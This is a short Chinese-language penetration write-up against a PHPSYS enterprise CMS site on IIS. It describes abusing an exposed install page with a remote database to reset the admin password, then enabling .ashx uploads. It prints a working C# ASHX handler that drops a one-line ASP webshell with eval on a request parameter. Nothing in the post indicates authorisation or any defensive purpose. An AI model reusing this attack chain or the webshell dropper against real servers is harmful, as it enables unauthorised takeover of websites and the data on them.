测试站点:xxx.com
信息收集:
Microsoft ASP.NET
PHP5.2.17
WINDOWS SERVER
IIS7.5
PHPSYS企建系统
目录扫描结果:
试了半天能利用的页面就只有admin.php,/install,后台和安装界面。
看了下安装页面是可以配置数据库和设置后台登录密码的,弄了个远程数据库测试了下,可以利用。
远程数据库里已经有表了,使用刚刚设置的密码成功进入后台。
GetShell:
找了半天有什么地方可以getshell,测试了都不行,然后看到有个附件上传这有个附件设置,在里面添加了asp,php,aspx,保存成功后会被注释掉,ashx似乎没做限制,保存成功后会成功留在允许上传的类型里面。
在网上找了一段ashx的上传代码,上传成功之后访问一下ashx后门的地址,会自动在ashx后门所在的目录下生成一个.asp的马。
<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("1.asp"));
file1.Write("<%eval request(\"password\")%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
本文作者为QioCuIi,转载请注明。